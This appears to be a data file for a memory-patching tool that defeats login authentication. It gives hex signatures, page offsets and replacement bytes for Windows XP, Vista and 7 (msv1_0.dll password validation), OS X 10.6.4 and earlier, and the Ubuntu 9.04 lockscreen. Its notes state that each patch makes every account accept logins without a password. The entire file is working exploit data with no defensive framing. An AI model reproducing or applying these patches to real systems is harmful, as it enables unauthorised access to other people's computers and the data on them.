# All values in hex
# Use ':' to separate patches for unlocks that need to patch several times

[Windows 7 (x86) msv1_0.dll MsvpPasswordValidate technique]
notes=NOPs out the jump that is called if passwords doesn't match. This will cause all accounts to no longer require a password.
signature=0x83F8107513B0018B
pageoffset=0x926
patch=0x83F8109090B0018B

[Windows 7 (x64) msv1_0.dll MsvpPasswordValidate technique]
notes=NOPs out the jump that is called if passwords doesn't match. This will cause all accounts to no longer require a password.
signature=0xC60F85C0B80000B8
pageoffset=0x926
patch=0xC6909090909090B8

[Windows Vista (x86) msv1_0.dll MsvpPasswordValidate technique]
notes=NOPs out the jump that is called if passwords doesn't match. This will cause all accounts to no longer require a password.
signature=0x83F8107513B0018B
pageoffset=0x432
patch=0x83F8109090B0018B

[Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique]
notes=NOPs out the jump that is called if passwords doesn't match. This will cause all accounts to no longer require a password. Offsets have changed between versions within SP3, only one of the patches is needed to successfully unlock.
signature=0x83F8107511B0018B:0x83F8107511B0018B
pageoffset=0x8AA:0x0862
patch=0x83F8109090B0018B:0x83F8109090B0018B

[Windows XP SP2 (x86) msv1_0.dll MsvpPasswordValidate technique]
notes=NOPs out the jump that is called if passwords doesn't match. This will cause all accounts to no longer require a password.
signature=0x8BFF558BEC83EC50A1
pageoffset=0x927
patch=0xB001

[Apple OS X 10.6.4 and lower (Intel x64) DoShadowHashAuth technique]
notes=Short circuits the password validation function, causing all login attempts to succeed.
signature=0x41BFF6C8FFFF48C78588
pageoffset=0x7CF
patch=0x41BF0000000048C78588

[Ubuntu 9.04 (x86) Gnome lockscreen unlock]
notes=Disable Ubuntu 9.04 32 bit Lockscreen.
signature=0xE8CC61000085C00F85E4000000C74424100E460508C744240C14460508C744240827010000C74424042D
pageoffset=0xD3F
patch=0xB80100000085